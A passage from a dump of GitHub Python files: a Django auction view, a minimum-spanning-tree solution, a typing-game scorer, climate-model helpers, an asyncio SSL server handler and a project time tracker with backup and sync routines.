(new_bid < loot.next_bid):\n return Auction(request)\n\n char = Character.objects.get(user=request.user)\n\n if char.gold < new_bid:\n return HttpResponseForbidden()\n print(-new_bid)\n char.gold -= new_bid\n char.save()\n\n # remove previous bet\n RemoveActiveBet(loot)\n\n # make new bet\n BET = Bid.objects.create()\n BET.loot_id = loot\n BET.character_id = char\n BET.active = True\n BET.price = new_bid\n BET.save()\n\n loot.next_bid = (loot.next_bid + 1 + (new_bid // 3))\n loot.save()\n\n return AuctionActive(request)\n\n else:\n return HttpResponseForbidden()\n","repo_name":"SanjaLV/WEB_II","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24440538774","text":"def solution(n, costs):\n costs.sort(key=lambda x: x[2])\n s = set([costs[0][0]])\n answer = 0\n while len(s) != n:\n for cost in costs:\n a, b, weight = cost\n if a in s and b in s:\n continue\n if a in s or b in s:\n s.update([a, b])\n answer += weight\n break\n \n return answer\n","repo_name":"bassyu/ps","sub_path":"programmers/3_섬_연결하기.py","file_name":"3_섬_연결하기.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2891486860","text":"import distance # pip install distance\nfrom myapp.constants import BRONZE, SILVER, GOLD, NONE\nLPS_CHEATER = 10\nLPS_GOLD = 6\nLPS_SILVER = 5\nLPS_BRONZE = 3\nCHAR_SCORE = 100\nMISTAKE_SCORE = 150\nTIME_PENALTY = 50\ndef score(usertyped, actual, time):\n \"Score is exponentially bigger with word lenth and exponentially reduced by number of errors\"\n lav = distance.levenshtein(usertyped, actual) # how different user's answer from the actual sentence\n l = min(len(usertyped), len(actual))\n score_lost_from_mistakes = MISTAKE_SCORE * lav * 1.3 ** lav\n score = l * CHAR_SCORE * 1.00 ** l - score_lost_from_mistakes - time * TIME_PENALTY\n score = round(score, 0)\n gold_score = calc_medal_score(LPS_GOLD, len(actual),0)\n silver_score = calc_medal_score(LPS_SILVER, len(actual),1)\n bronze_score = calc_medal_score(LPS_BRONZE, len(actual),2)\n if len(actual) / time > LPS_CHEATER:\n \"LIKELY A CHEATER\"\n medal = NONE\n score = -1\n elif score > gold_score:\n medal = GOLD\n elif score > silver_score:\n medal = SILVER\n elif score > bronze_score:\n medal = BRONZE\n else:\n medal = NONE\n return max(score,0), medal, gold_score, silver_score, bronze_score, score_lost_from_mistakes\n\ndef calc_medal_score(lps, length, mistakes):\n expected_time = length / lps\n score = length * CHAR_SCORE * 1.00**length - MISTAKE_SCORE * mistakes * 1.3 ** mistakes - expected_time * TIME_PENALTY\n return round(score,0)","repo_name":"rasponien/UI-Typonaut","sub_path":"myapp/score_calculator.py","file_name":"score_calculator.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28498011030","text":"import numexpr as ne\nimport numpy as np\nimport torch\nimport pandas as pd\n\nfrom .ancil.gas_parameters import get_gas_params\nfrom .ancil.thermal_parameters import get_thermal_params\nfrom .ancil.units import Units\nfrom .constants import TCR_DBL\n\n\ndef calculate_alpha(G, G_A, T, r0, rC, rT, rA, g0, g1, iirf100_max=False):\n iirf100_val = ne.evaluate(\"abs(r0 + rC * (G-G_A) + rT * T + rA * G_A)\")\n if iirf100_max:\n iirf100_val = ne.evaluate( # noqa: F841\n \"where(iirf100_val>iirf100_max,iirf100_max,iirf100_val)\"\n )\n alpha_val = ne.evaluate(\"g0 * exp(iirf100_val / g1)\")\n return alpha_val\n\n\ndef calculate_g(a, tau):\n g1 = ne.evaluate(\n \"sum( a * tau * ( 1. - ( 1. + 100/tau ) * exp(-100/tau) ), axis = 0)\"\n )\n g0 = np.exp(-1 * np.sum(a * tau * (1.0 - np.exp(-100 / tau)), axis=0) / g1)\n return g0, g1\n\n\ndef step_concentration(\n emissions, a, dt, alpha, tau, R_old, G_A_old, PI_conc, emis2conc\n):\n decay_rate = ne.evaluate(\"1/(alpha*tau)\") # noqa: F841\n decay_factor = ne.evaluate(\"exp(-dt*decay_rate)\") # noqa: F841\n R = ne.evaluate(\n \"emissions * a / decay_rate *\\\n ( 1. - decay_factor ) + R_old * decay_factor\"\n )\n G_A = ne.evaluate(\"sum(R,axis=0)\")\n C = ne.evaluate(\"PI_conc + emis2conc * (G_A + G_A_old) / 2\")\n return C, R, G_A\n\n\ndef step_forcing(C, PI_conc, f1, f2, f3):\n logforc = ne.evaluate(\n \"f1 * where( (C/PI_conc) <= 0, 0, log(C/PI_conc) )\",\n {\"f1\": f1, \"C\": C, \"PI_conc\": PI_conc},\n )\n linforc = ne.evaluate(\"f2 * (C - PI_conc)\", {\"f2\": f2, \"C\": C, \"PI_conc\": PI_conc})\n sqrtforc = ne.evaluate(\n \"f3 * ( (sqrt( where(C<0 ,0 ,C ) ) - sqrt(PI_conc)) )\",\n {\"f3\": f3, \"C\": C, \"PI_conc\": PI_conc},\n )\n\n RF = logforc + linforc + sqrtforc\n return RF\n\n\ndef step_temperature(S_old, F, q, d, dt=1):\n decay_factor = ne.evaluate(\"exp(-dt/d)\") # noqa: F841\n S_new = ne.evaluate(\"q * F * (1 - decay_factor) + S_old * decay_factor\")\n T = ne.evaluate(\"sum( (S_old + S_new)/2, axis=0 )\")\n return S_new, T\n\n\ndef step_I(I_old, K, q, d, dt=1):\n \"\"\"Takes next time step to construct recursively the I matrix where\n\n I_{i,j} = (q/d)∫K(ti, s)exp(-(tj-s)/d)ds from 0 to tj\n\n Rows fix the timestep inside K(ti, s) and colums determine the exponential term and\n integration bounds.\n\n I_{i,j} = d * k(ti,tj) * (1 - exp(-dt/d)) + I_{i,j-1} * exp(-dt/d)\n\n Args:\n I_old (np.ndarray): column for previous time step t_{j-1} (i.e. at fixed ti)\n K (np.ndarray): k(ti, s) for all times s\n d (np.ndarray): (nboxes,)\n dt (float): timestep\n\n Returns:\n type: np.ndarray column for time step t_j\n \"\"\"\n decay_factor = torch.exp(-dt / d)\n I_new = q * K * (1 - decay_factor) + I_old * decay_factor\n I_new = (I_new + I_old) / 2\n return I_new\n\n\ndef step_kernel(Kj_old, I_row, q, d, dt=1):\n \"\"\"Takes next time step to construct recursively kernel matrix Kj\n\n kj(ti, tj) = kj(t_{i-1},tj) * exp(-dt/d) + (q^2 / d) * I_{i,j} * (1 - exp(-dt/d))\n\n Args:\n Kj_old (np.ndarray): row for previous time step\n I_row (np.ndarray): Description of parameter `I_new`.\n q (np.ndarray): (nboxes,)\n d (np.ndarray): (nboxes,)\n dt (float): timestep\n\n Returns:\n type: np.ndarray row for time step t_i\n\n \"\"\"\n decay_factor = torch.exp(-dt / d)\n Kj_new = Kj_old * decay_factor + q * I_row * (1 - decay_factor)\n Kj_new = (Kj_new + Kj_old) / 2\n return Kj_new\n","repo_name":"shahineb/FaIRGP","sub_path":"src/fair/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":3512,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"73027162933","text":"import _ssl\nimport asyncio\nimport logging\nimport multiprocessing\nimport ssl\nimport sys\nimport types\nfrom concurrent import futures\nfrom bfnet.Butterfly import Butterfly\nfrom bfnet.Net import Net\n\n\nclass ButterflyHandler(object):\n \"\"\"\n A ButterflyHandler is a class that describes what happens when a Butterfly is caught by a net.\n\n It has several methods that are automatically called at critical stages in the connection:\n - :func:`ButterflyHandler.on_connection`\n - :func:`ButterflyHandler.on_disconnect`\n\n These methods are called at the appropriate time, as their name describes.\n \"\"\"\n instance = None\n\n def __init__(self, event_loop: asyncio.AbstractEventLoop, ssl_context: ssl.SSLContext=None,\n loglevel: int=logging.DEBUG, buffer_size: int=asyncio.streams._DEFAULT_LIMIT):\n \"\"\"\n Create a new ButterflyHandler.\n\n This class should not be called directly. Instead, use ButterflyHandler.get_handler() to\n get a reference instead.\n\n :param event_loop: The :class:`asyncio.BaseEventLoop` to use for the server.\n :param ssl_context: The :class:`ssl.SSLContext` to use for the server.\n :param loglevel: The logging level to use.\n :param buffer_size: The buffer size to use.\n \"\"\"\n self._event_loop = event_loop\n self._server = None\n if not ssl_context:\n # This looks very similar to the code for create_default_context\n # That's because it is the code\n # For some reason, create_default_context doesn't like me and won't work properly\n self._ssl = ssl.SSLContext(protocol=ssl.PROTOCOL_SSLv23)\n # SSLv2 considered harmful.\n self._ssl.options |= ssl.OP_NO_SSLv2\n\n # SSLv3 has problematic security and is only required for really old\n # clients such as IE6 on Windows XP\n self._ssl.options |= ssl.OP_NO_SSLv3\n self._ssl.load_default_certs(ssl.Purpose.SERVER_AUTH)\n self._ssl.options |= getattr(_ssl, \"OP_NO_COMPRESSION\", 0)\n self._ssl.set_ciphers(ssl._RESTRICTED_SERVER_CIPHERS)\n self._ssl.options |= getattr(_ssl, \"OP_CIPHER_SERVER_PREFERENCE\", 0)\n\n else:\n self._ssl = ssl_context\n\n self._bufsize = buffer_size\n self.default_butterfly = Butterfly\n self.default_net = Net\n\n self._executor = futures.ThreadPoolExecutor(max_workers=multiprocessing.cpu_count() * 2 + 1)\n\n self.net = None\n self.log_level = loglevel\n self.logger = logging.getLogger(\"ButterflyNet\")\n self.logger.setLevel(loglevel)\n if self.logger.level <= logging.DEBUG:\n self._event_loop.set_debug(True)\n\n self.butterflies = {}\n\n def stop(self):\n \"\"\"\n Stop a Net.\n\n This will kill all handlers, disconnect all butterflies, and unbind the server.\n \"\"\"\n self.logger.info(\"Stopping server.\")\n print(\"Stopping server.\")\n # Loop over our Butterflies.\n for _, bf in self.butterflies.items():\n assert isinstance(bf, tuple), \"bf should be a tuple (bf, fut) -> {}\".format(bf)\n # Cancel the future.\n bf[1].cancel()\n # Cancel the Butterfly.\n bf[0].stop()\n try:\n self.net.stop()\n except AttributeError:\n pass\n self._event_loop.stop()\n\n @asyncio.coroutine\n def on_connection(self, butterfly: Butterfly):\n \"\"\"\n Stub for an on_connection event.\n\n This will call the data handler, and save the result.\n\n This method is a coroutine.\n :param butterfly: The butterfly object created.\n \"\"\"\n # Begin handling.\n handler = self.begin_handling(butterfly)\n # Create a new entry in our butterfly table.\n self.butterflies[\"{}:{}\".format(butterfly.ip, butterfly.client_port)] = (butterfly, handler)\n\n @asyncio.coroutine\n def on_disconnect(self, butterfly: Butterfly):\n \"\"\"\n Stub for an on_disconnect event.\n\n This will kill the data handler.\n\n This method is a coroutine.\n :param butterfly: The butterfly object created.\n \"\"\"\n s = \"{}:{}\".format(butterfly.ip, butterfly.client_port)\n if s in self.butterflies:\n bf = self.butterflies.pop(s)\n # These are here by default - don't call super() if you modify the butterfly dict!\n assert isinstance(bf, tuple)\n assert len(bf) == 2\n bf[1].cancel()\n\n def begin_handling(self, butterfly: Butterfly):\n \"\"\"\n Begin the handler loop and start handling data that flows in.\n\n This will schedule the Net's handle() coroutine to run soon.\n :return A Future object for the handle() coroutine.\n \"\"\"\n res = self.net.handle(butterfly)\n return self._event_loop.create_task(res)\n\n def async_func(self, fun: types.FunctionType) -> asyncio.Future:\n \"\"\"\n Turns a blocking function into an async function by running it inside an executor.\n\n This executor is by default a :class:`~concurrent.futures.ThreadPoolExecutor`.\n :param fun: The function to run async.\n If you wish to pass parameters to this func, use\n functools.partial (https://docs.python.org/3/library/functools.html#functools.partial).\n :return: A :class:`~asyncio.Future` object for the function.\n \"\"\"\n future = self._event_loop.run_in_executor(self._executor, fun)\n return future\n\n def async_and_wait(self, fun: types.FunctionType):\n \"\"\"\n Turns a blocking function into an async function by running it inside an executor. It then uses\n :func:`~asyncio.wait_for` to wait for the Future to complete.\n\n This executor is by default a :class:`~concurrent.futures.ThreadPoolExecutor`.\n :param fun: The function to run async.\n If you wish to pass parameters to this func, use\n functools.partial (https://docs.python.org/3/library/functools.html#functools.partial).\n :return: The result of the function.\n \"\"\"\n future = self.async_func(fun)\n return (yield from asyncio.wait_for(future, loop=self._event_loop))\n\n def create_task(self, coro: types.FunctionType):\n \"\"\"\n Create a new task on the event loop, and return the :class:`~asyncio.Future` created.\n :param coro: A coroutine or future to add.\n :return: The Future created.\n \"\"\"\n future = self._event_loop.create_task(coro)\n return future\n\n def call_soon(self, coro: types.FunctionType, *args):\n \"\"\"\n Call a coroutine or Future as soon as possible on the event loop.\n :param coro: The coroutine or Future to call.\n :param args: The arguments to the callback.\n \"\"\"\n handle = self._event_loop.call_soon(coro, args)\n return handle\n\n def set_executor(self, executor: futures.Executor):\n \"\"\"\n Set the default executor for use with async_func.\n :param executor: A :class:`~concurrent.futures.Executor` to set as the executor.\n \"\"\"\n self._executor = executor\n\n def _load_ssl(self, ssl_options: tuple):\n \"\"\"\n Internal call used to load SSL parameters from the SSL option tuple.\n\n Do not touch.\n :param ssl_options: The SSL options to use.\n \"\"\"\n try:\n self._ssl.load_cert_chain(certfile=ssl_options[0], keyfile=ssl_options[1], password=ssl_options[2])\n except IOError as e:\n self.logger.error(\"Unable to load certificate files: {}\".format(e))\n self.stop()\n\n @classmethod\n def get_handler(cls, loop: asyncio.AbstractEventLoop, ssl_context: ssl.SSLContext=None,\n log_level: int=logging.INFO, buffer_size: int=asyncio.streams._DEFAULT_LIMIT):\n \"\"\"\n Get the instance of the handler currently running.\n\n :param loop: The :class:`asyncio.BaseEventLoop` to use for the server.\n :param ssl_context: The :class:`ssl.SSLContext` to use for the server.\n :param log_level: The logging level to use.\n :param buffer_size: The buffer size to use.\n \"\"\"\n if not cls.instance:\n cls.instance = cls(loop, ssl_context, log_level, buffer_size)\n return cls.instance\n\n def butterfly_factory(self):\n \"\"\"\n Create a new :class:`Butterfly` instance.\n\n This method will create a new Butterfly from the default Butterfly\n creator specified by self.default_butterfly.\n\n Override this if you use a different constructor in your Butterfly.\n :return:\n \"\"\"\n bf = self.default_butterfly(loop=self._event_loop, bufsize=self._bufsize, handler=self)\n return bf\n\n @asyncio.coroutine\n def create_server(self, bind_options: tuple, ssl_options: tuple) -> Net:\n \"\"\"\n Create a new server using the event loop specified.\n\n This method is a coroutine.\n :param bind_options: The IP and port to bind to on the server.\n :param ssl_options: A tuple of SSL options:\n - The certificate file to use\n - The private key to use\n - The private key password, or None if it does not have a password.\n :return: A :class:`bfnet.Net.Net` object.\n \"\"\"\n\n # Load SSL.\n self._load_ssl(ssl_options)\n\n # Create the server.\n host, port = bind_options\n self._server = yield from self._event_loop.create_server(self.butterfly_factory, host=host, port=port,\n ssl=self._ssl)\n # Create the Net.\n # Use the default net.\n self.net = self.default_net(ip=host, port=port, loop=self._event_loop, server=self._server)\n self.net._set_bf_handler(self)\n # Create a signal handler.\n if sys.platform != \"win32\":\n self._event_loop.add_signal_handler(15, self.stop)\n return self.net\n\n\nButterflyHandler.get_handler.__annotations__['return'] = ButterflyHandler\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/SunDwarf_ButterflyNet/ButterflyNet-master/bfnet/BFHandler.py","file_name":"BFHandler.py","file_ext":"py","file_size_in_byte":10046,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"74865417653","text":"import os\nimport json\nfrom timer import td_str\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom config import get_base_path\nfrom functions import listOfDates\nfrom ColourText import format_text\nfrom compress_json import json_unzip, json_zip, ZIPJSON_KEY\n\n\nclass Projects:\n def __init__(self, file=\"projects.json\"):\n \"\"\"\n :param file: filename to save and load project data from. File has to be located in the base directory\n \"\"\"\n\n self.__dict = {}\n self.path = os.path.join(get_base_path(), file)\n self.exported_path = os.path.join(get_base_path(), \"Exported\")\n self.__status_tags = [\"active\", \"paused\", \"complete\"]\n\n self.__load()\n\n # run a backup at the end of every month\n\n # if the year is not the same as the year from the last save date,\n # save all the projects of the last year to an archives file\n last_save_date = self.__last_save_date()\n if last_save_date.year != datetime.today().year:\n archive_dir = os.path.join(get_base_path(), \"Archives\")\n archive_file = os.path.join(archive_dir, f\"Projects-{last_save_date.year}.json\")\n\n if not os.path.isdir(archive_dir):\n os.mkdir(archive_dir)\n\n if not os.path.exists(archive_file):\n prjct_json = json.dumps(self.__dict, indent=4)\n with open(archive_file, \"w\") as json_writer:\n json_writer.write(prjct_json)\n\n # empty dict and save\n self.__dict.clear()\n self.__save()\n\n print(f\"Archived {last_save_date.year} projects to \"\n f\"'Projects-{last_save_date.year}.json' in the Archives directory ({archive_dir}).\")\n\n def __str__(self):\n return str(self.__dict)\n\n def __len__(self):\n return len(self.__dict)\n\n def get_keys(self):\n \"\"\"\n :return: a list of all the existing project names\n \"\"\"\n return list(self.__dict.keys())\n\n def get_project(self, name: str):\n \"\"\"\n Return a project dictionary.\n :param name: existing project name\n :return: project dict object\n \"\"\"\n if name not in self.__dict:\n print(f\"Invalid project name! '{name}' does not exist!\")\n return\n\n return self.__dict[name]\n\n def __last_save_date(self):\n dates = [datetime.strptime(self.__dict[project]['Last Updated'], \"%m-%d-%Y\") for project in self.__dict]\n dates.sort()\n\n if len(dates) == 0:\n return datetime.today()\n\n return dates[-1]\n\n def delete_project(self, name: str):\n \"\"\"\n Delete an existing project\n \"\"\"\n if name not in self.__dict:\n print(f\"Invalid project name! '{name}' does not exist!\")\n return\n\n self.__dict.pop(name)\n self.__save()\n\n def rename_project(self, name: str, new_name: str):\n \"\"\"\n Rename existing project\n \"\"\"\n if name not in self.__dict:\n print(f\"Invalid project name! '{name}' does not exist!\")\n return\n\n # proj_data = self.get_project(name)\n # self.delete_project(name)\n self.__dict[new_name] = self.__dict.pop(name)\n self.__save()\n\n def rename_subproject(self, name: str, sub_name: str, new_sub_name: str):\n \"\"\"\n Rename existing subproject\n \"\"\"\n if name not in self.__dict:\n print(f\"Invalid project name! '{name}' does not exist!\")\n return\n\n if sub_name not in self.__dict[name]['Sub Projects']:\n print(f\"Invalid subproject name! '{sub_name}' does not exist!\")\n return\n\n # rename 'Sub Projects' keys\n if new_sub_name in self.__dict[name]['Sub Projects']:\n print(f\"Subproject name '{new_sub_name}' already exists, merging subprojects...\")\n # merge the subprojects\n self.__dict[name]['Sub Projects'][new_sub_name] += self.__dict[name]['Sub Projects'].pop(sub_name)\n else:\n self.__dict[name]['Sub Projects'][new_sub_name] = self.__dict[name]['Sub Projects'].pop(sub_name)\n\n # rename all the subproject entries in the session history\n for index in range(len(self.__dict[name]['Session History'])):\n self.__dict[name]['Session History'][index]['Sub-Projects'] = \\\n [new_sub_name if x == sub_name else x for x in\n self.__dict[name]['Session History'][index]['Sub-Projects']]\n\n self.__save()\n\n def remove_subproject(self, name, sub_name):\n project = self.get_project(name)\n if sub_name not in project['Sub Projects']:\n print(f\"Invalid subproject name! '{sub_name}' does not exist!\")\n return\n\n old_total_time = project['Total Time']\n\n # remove session history entries with the subproject IF the subproject is the only one in the entry\n for session in project['Session History']:\n if len(session['Sub-Projects']) == 1 and sub_name in session['Sub-Projects']:\n project['Session History'].remove(session)\n # otherwise, remove the subproject from the entry\n elif len(session['Sub-Projects']) > 1 and sub_name in session['Sub-Projects']:\n session['Sub-Projects'].remove(sub_name)\n else: # do nothing\n pass\n\n # update the total time\n project['Total Time'] = 0\n for session in project['Session History']:\n project['Total Time'] += float(session['Duration'])\n\n project['Total Time'] = round(project['Total Time'], 2)\n\n # remove the subproject from the project dict\n project['Sub Projects'].pop(sub_name)\n\n print(format_text(f\"Removed subproject [_text256_26_]{sub_name}[reset] from project [bright red]{name}[reset]\"))\n print(format_text(f\"Total time for project [bright red]{name}[reset] is now \"\n f\"[_text256_34_]{round(project['Total Time']/60, 2)} hours[reset], \"\n f\"from [_text256_34_]{round(old_total_time/60, 2)} hours[reset]\"))\n # update and save dict\n self.__dict[name] = project\n self.__save()\n\n def print_json_project(self, name: str):\n project = self.get_project(name)\n print(json.dumps(project, indent=4))\n\n def create_project(self, name: str, sub_names=None):\n \"\"\"\n Create a new project.\n\n :param name: project name\n :param sub_names: names of the project's subprojects if any.\n \"\"\"\n if name not in self.__dict:\n sub_projects = {}\n\n if sub_names is not None:\n for sub_name in sub_names:\n sub_projects[sub_name] = 0.0\n\n self.__dict[name] = {\n 'Start Date': datetime.today().strftime(\"%m-%d-%Y\"),\n 'Last Updated': datetime.today().strftime(\"%m-%d-%Y\"),\n 'Total Time': 0.0,\n 'Status': self.__status_tags[0],\n 'Sub Projects': sub_projects,\n 'Session History': []\n }\n self.__save()\n return True\n\n def update_project(self, session_out: tuple, name: str, sub_names=None,\n update_date=datetime.today().strftime(\"%m-%d-%Y\")):\n \"\"\"\n Save project session history.\n\n :param session_out: a tuple with the session info including duration, session note, start and end time\n :param name: project to update\n :param sub_names: list of session subprojects\n :param update_date: date the project was tracked. set to current date by default.\n \"\"\"\n\n if name not in self.__dict:\n print(f\"Invalid project name! '{name}' does not exist!\")\n return\n\n duration = session_out[0]\n session_note = session_out[1]\n\n if type(session_out[2]) is not datetime:\n start_time = datetime.fromtimestamp(session_out[2]).strftime('%X')\n end_time = datetime.fromtimestamp(session_out[3]).strftime('%X')\n else:\n start_time = session_out[2].strftime('%X')\n end_time = session_out[3].strftime('%X')\n\n total_time = float(self.__dict[name]['Total Time']) + duration\n self.__dict[name]['Total Time'] = round(total_time, 2)\n\n if sub_names is not None:\n sub_projects = dict(self.__dict[name]['Sub Projects'])\n\n for sub_name in sub_names:\n if sub_name in sub_projects:\n total = float(sub_projects[sub_name])\n sub_projects[sub_name] = round(total + duration, 2)\n else:\n sub_projects[sub_name] = duration\n\n self.__dict[name]['Sub Projects'] = sub_projects\n\n self.__dict[name]['Last Updated'] = update_date if \\\n datetime.strptime(update_date, \"%m-%d-%Y\") > \\\n datetime.strptime(self.__dict[name]['Last Updated'], \"%m-%d-%Y\") \\\n else self.__dict[name]['Last Updated']\n\n history_log = {\n \"Date\": update_date,\n \"Start Time\": start_time,\n \"End Time\": end_time,\n \"Sub-Projects\": sub_names,\n \"Duration\": round(duration, 2),\n \"Note\": session_note\n }\n\n try:\n self.__dict[name]['Session History'].append(history_log)\n except KeyError:\n self.__dict[name]['Session History'] = [history_log]\n\n self.__save()\n\n def track(self, start_time, end_time, project, sub_projects, session_note):\n \"\"\"\n Track a session that wasn't recorded in real-time.\n\n :param start_time: session start time format: \"MM-DD-YYYY HH:MM\" if MM-DD-YYYY\n is not specified, track for the current day\n\n :param end_time: session end time format: \"MM-DD-YYYY HH:MM\" if MM-DD-YYYY\n is not specified, track for the current day\n\n :param project: project name\n :param sub_projects: session subprojects\n :param session_note: session note\n \"\"\"\n\n def check_date(time):\n # check if date is specified in the time string, if not set it to today\n if len(time.split(\" \")) == 1: # if only time is specified\n time = datetime.strptime(time, '%H:%M')\n time = time.replace(year=datetime.today().year, month=datetime.today().month, day=datetime.today().day)\n return time\n else:\n return datetime.strptime(time, '%m-%d-%Y %H:%M')\n\n def check_year(time):\n time = check_date(time)\n if time.year != datetime.today().year:\n print(format_text(f\"Year entered as [cyan]{time.year}[reset]. \"\n f\"Did you mean [cyan]{datetime.today().year}[reset]?\"))\n confirm = input(\"[Y/N]: \")\n if confirm.lower() == 'y':\n time = time.replace(year=datetime.today().year)\n return time\n\n start_time = check_year(start_time.strip())\n end_time = check_year(end_time.strip())\n\n update_date = end_time.strftime(\"%m-%d-%Y\")\n duration = end_time - start_time\n duration = duration.total_seconds() / 60\n\n if project not in self.__dict:\n x = input(format_text(f\"'[bright red]{project}[reset]' does not exist. Create it? \\n[Y/N]: \"))\n if x in [\"Y\", \"y\"]:\n self.create_project(project, sub_projects)\n else:\n return\n\n project_status = self.__dict[project]['Status']\n if project_status != \"active\":\n print(format_text(f\"Cannot start a timer for a '[bright magenta]{project_status}[reset]' project.\"))\n return\n\n for sub_proj in sub_projects:\n if sub_proj not in self.__dict[project]['Sub Projects']:\n x = input(format_text(f\"Sub-project '[_text256_26_]{sub_proj}[reset]' does not exist. \"\n f\"Create it? \"\n f\"\\n[Y/N]: \")\n )\n if x not in [\"Y\", \"y\"]:\n return\n\n if duration < 0:\n print(format_text(f\"Invalid session time. End time cannot be before start time.\"))\n return\n\n self.update_project((duration, session_note, start_time, end_time), project, sub_projects, update_date)\n\n sub_projects = [f\"[_text256_26_]{sub_proj}[reset]\" for sub_proj in sub_projects]\n\n duration = str(timedelta(minutes=duration)).split('.')[0]\n duration = datetime.strptime(duration, \"%H:%M:%S\")\n if duration.hour > 0:\n duration = duration.strftime(\"%Hh %Mm\")\n else:\n duration = duration.strftime(\"%Mm %Ss\")\n\n print(format_text(f\"Tracked [bright red]{project}[reset] \"\n f\"{sub_projects} from [cyan]{start_time.strftime('%X')}[reset]\"\n f\" to [cyan]{end_time.strftime('%X')}[reset] \"\n f\"[_text256_34_]({duration})[reset]\"), end=\"\")\n\n print(format_text(f\" -> [yellow]{session_note}[reset]\" if session_note != \"\" else \"\"))\n\n def merge(self, project1: dict, project2: dict, new_name: str):\n try:\n # get all the keys from both projects and initially set them to 0\n subs = {**project1['Sub Projects'], **project2['Sub Projects']}\n new_subs = {}\n for key in subs:\n new_subs[key] = 0.0\n\n merged_project = {\n 'Start Date': project1['Start Date'] if\n datetime.strptime(project1['Start Date'], '%m-%d-%Y') < datetime.strptime(project2['Start Date'],\n '%m-%d-%Y')\n else project2['Start Date'],\n\n 'Last Updated': project1['Last Updated'] if\n datetime.strptime(project1['Last Updated'], '%m-%d-%Y') > datetime.strptime(project2['Last Updated'],\n '%m-%d-%Y')\n else project2['Last Updated'],\n\n \"Status\": project1['Status'],\n\n \"Total Time\": 0.0,\n\n \"Sub Projects\": new_subs,\n\n \"Session History\": sorted(\n [ # combine session histories and sort by date\n *project1['Session History'],\n *project2['Session History']\n ],\n # sort array by date and end time\n key=lambda x: (datetime.strptime(x['Date'], '%m-%d-%Y'),\n datetime.strptime(x[\"End Time\"], \"%H:%M:%S\")\n )\n ),\n }\n\n merged_project = self.__remove_duplicate_sessions(merged_project)\n\n self.__dict[new_name] = merged_project\n self.__save()\n except Exception as e:\n print(f\"An error occurred when trying to merge: {e}\")\n\n def backup(self):\n \"\"\"\n Creates a backup of the projects file.\n :return: path to the backup file or False if an error occurred\n \"\"\"\n\n backup_dir = os.path.join(get_base_path(), \"Backups\")\n\n if not os.path.exists(backup_dir):\n os.mkdir(backup_dir)\n\n backup_path = os.path.join(backup_dir, f\"backup-{self.__last_save_date().strftime('%m-%d-%Y')}.json\")\n try:\n with open(backup_path, 'w') as f:\n f.write(json.dumps(self.__dict, indent=4))\n return backup_path\n except Exception as e:\n print(f\"An error occurred when trying to create a backup projects: {e}\")\n return False\n\n def restore_backup(self, backup_path):\n \"\"\"\n Restores the projects file from a backup. Overwrites the current projects file.\n :param backup_path:\n :return: True if the backup was restored successfully, False if an error occurred\n \"\"\"\n\n # check if the backup file exists\n if not os.path.exists(backup_path):\n print(f\"Backup file does not exist: {backup_path}\")\n return False\n\n # load the backup file\n with open(backup_path, 'r') as f:\n backup = json.load(f)\n # check if the backup is compressed and decompress it if it is\n if ZIPJSON_KEY in backup:\n backup = json_unzip(backup)\n\n self.__dict = backup # overwrite the current projects file with the backup\n self.__save()\n return True\n\n # method to sync projects with a remote server or local file\n def sync(self, filepath):\n \"\"\"\n Sync projects with a local file. Projects from both files will be merged and both files will be updated.\n :param filepath: the path to the remote file (a .json file)\n :return: True if the sync was successful, False if an error occurred\n \"\"\"\n # check if the path is accessible\n try:\n if not os.path.exists(filepath):\n if not os.path.isdir(os.path.dirname(filepath)):\n os.makedirs(os.path.dirname(filepath))\n with open(filepath, 'w'):\n pass\n\n with open(filepath, 'r'):\n pass\n except Exception as e:\n print(f\"An error occurred when trying to access the remote file: {e}\")\n return False\n\n print(f\"Syncing projects with file: {filepath}\")\n\n # backup current projects\n backup_path = self.backup()\n if backup_path:\n print(f\"Backup created: {backup_path}\")\n else:\n print(\"Failed to create backup! Sync aborted!\")\n return False\n\n is_compressed = False\n\n # get the data from the remote file\n try:\n with open(filepath, 'r') as f:\n remote_data = {}\n if os.stat(filepath).st_size != 0: # if the file is not empty, load the data\n remote_data = json.load(f)\n is_compressed = ZIPJSON_KEY in remote_data\n # check if remote file is compressed and unzip it if so\n if is_compressed:\n remote_data = json_unzip(remote_data)\n except Exception as e:\n print(f\"An error occurred when trying to open the remote file: {e}\")\n return False\n\n # use the merge method to merge the remote projects with the local projects\n for project in {**self.__dict, **remote_data}: # combine the project keys of both dicts\n if project in self.get_keys() and project in remote_data.keys():\n self.merge(self.__dict[project], remote_data[project],\n project) # the project have the same name, so they will be merged into one project\n print(format_text(f\"[yellow]{project}[reset] already exists, merging...\"))\n elif project not in remote_data.keys():\n print(format_text(f\"[green]{project}[reset] not found in remote file, adding...\"))\n else:\n self.__dict[project] = remote_data[project] # otherwise just add the project to the local projects\n print(format_text(f\"[green]{project}[reset] added to projects\"))\n\n # save the local projects\n self.__save()\n\n # update remote file\n try:\n with open(filepath, 'w') as f:\n # compress the data before writing it to the file if the file was originally compressed\n if is_compressed:\n f.write(json.dumps(json_zip(self.__dict)))\n else: # otherwise just write the data to the file\n f.write(json.dumps(self.__dict, indent=4))\n except Exception as e:\n print(f\"An error occurred when trying to update the remote file: {e}\")\n return False\n\n print(f\"Sync successful!\")\n return True\n\n @staticmethod\n def __remove_duplicate_sessions(project: dict):\n \"\"\"\n Private method that removes duplicate sessions from a project.\n Duplicate sessions are sessions with the same name, date, start-time, end-time, and duration.\n :param project: name of the project to remove duplicates from\n \"\"\"\n if not project:\n return\n\n project['Total Time'] = 0\n for sub in project['Sub Projects']:\n project['Sub Projects'][sub] = 0\n\n seen = set() # use a set to keep track of unique sessions\n new_session_history = [] # create a new session history\n\n for session in project['Session History']:\n # create a tuple with the values of the keys used to determine uniqueness\n key = (session['Date'], session['Start Time'], session['End 